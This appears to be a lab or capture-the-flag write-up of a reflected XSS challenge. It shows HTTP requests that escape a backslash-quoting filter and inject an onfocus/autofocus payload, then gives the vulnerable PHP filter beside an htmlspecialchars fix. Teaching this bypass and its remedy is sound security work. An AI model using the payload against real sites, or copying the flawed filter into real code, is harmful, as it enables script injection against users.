Exploitation
To protect the application, the author states that the " character is now escaped:
The " character does indeed get processed: it is escaped by inserting a \ in front of it:
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/

search=whatever%22&submit=Envoyer

HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2100
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="whatever\"" placeholder="keyword" required>
</div>
The most obvious bypass to try is to insert a \ character as well, in order to escape the escape:
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/

search=whatever%5C%22&submit=Envoyer

HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2101
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="whatever\\"" placeholder="keyword" required>
</div>
This appears to work:
All that remains is to adapt my autofocus-based payload, whatever\" onfocus=alert(1) autofocus x=\"
(note that I also drop the quotes around the JavaScript code):
POST /xss6/ HTTP/1.1
Host: localhost:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://localhost:9003
Connection: close
Referer: http://localhost:9003/xss6/

search=whatever%5C%22+onfocus%3Dalert%281%29+autofocus+x%3D%5C%22&submit=Envoyer

HTTP/1.1 200 OK
Server: Apache/2.4.53 (Debian)
X-Powered-By: PHP/8.0.18
Content-Length: 2134
Connection: close
Content-Type: text/html; charset=UTF-8

<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="whatever\\" onfocus=alert(1) autofocus x=\\"" placeholder="keyword" required>
</div>
Source code analysis
The xss_check() function processes the " character, which is escaped by prepending a \ to every occurrence. The keyword is then displayed as the value of the HTML value attribute:
<?php
if (isset($_POST['submit']) && isset($_POST['search'])) {
    $keyword = $_POST['search'];
}

// Challenge filter: prefixes every " with a backslash, then URL-decodes the result.
function xss_check($data) {
    $input = str_replace('"', '\"', $data);
    $input = urldecode($input);
    return $input;
}
?>
<div class="row">
<form name="forgetPass" method="post">
<div class="form-group col-md-2">
<input type="text" class="form-control" id="search" name="search" value="<?php if (isset($keyword) && !empty($keyword)) { echo xss_check($keyword); } ?>" placeholder="keyword" required>
</div>
<div class="form-group col-md-2">
<input type="submit" class="form-control btn btn-default" name="submit">
</div>
</form>
</div>
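To make the root cause concrete, here is an added example (my own code, not the challenge's; the function names xss_check_vulnerable and xss_check_fixed are mine): the filter as written beside a replacement that encodes for the HTML attribute context. The HTML parser gives \ no special meaning inside a quoted attribute, so prefixing " with a backslash only turns an input of \" into \\" and the bare " still terminates the attribute. htmlspecialchars() with ENT_QUOTES turns every " into &quot;, which cannot end the attribute whatever precedes it; the urldecode() call is dropped as well, since PHP has already decoded $_POST.

```php
<?php
// Added example, not the challenge's own code. Compares the backslash filter
// from the writeup with a context-correct encoder for an HTML attribute value.

// The filter as it appears in the challenge source (kept for comparison).
function xss_check_vulnerable(string $data): string
{
    // Backslash escaping is a string-literal convention (JavaScript, SQL),
    // not an HTML one: the attribute parser ignores \ entirely.
    $input = str_replace('"', '\"', $data);
    return urldecode($input);
}

// Replacement: encode for the HTML attribute context.
function xss_check_fixed(string $data): string
{
    // & < > " and ' become entities; a " can no longer close the attribute.
    // No urldecode(): $_POST is already decoded, decoding again only
    // reintroduces characters the caller never saw.
    return htmlspecialchars($data, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: a plain keyword with a quote, then the writeup's payload
// (PHP single quotes keep the backslashes literal).
$inputs = [
    'whatever"',
    'whatever\" onfocus=alert(1) autofocus x=\"',
];

foreach ($inputs as $value) {
    printf("input:      %s\n", $value);
    printf("vulnerable: value=\"%s\"\n", xss_check_vulnerable($value));
    printf("fixed:      value=\"%s\"\n\n", xss_check_fixed($value));
}
```

For the payload, the vulnerable branch prints value="whatever\\" onfocus=alert(1) autofocus x=\\"" (the attribute ends after the doubled backslash and the rest becomes new attributes), while the fixed branch prints value="whatever\&quot; onfocus=alert(1) autofocus x=\&quot;" (one attribute, displayed verbatim). The general rule is to pick the encoder by the output context the data lands in, not by which characters look dangerous.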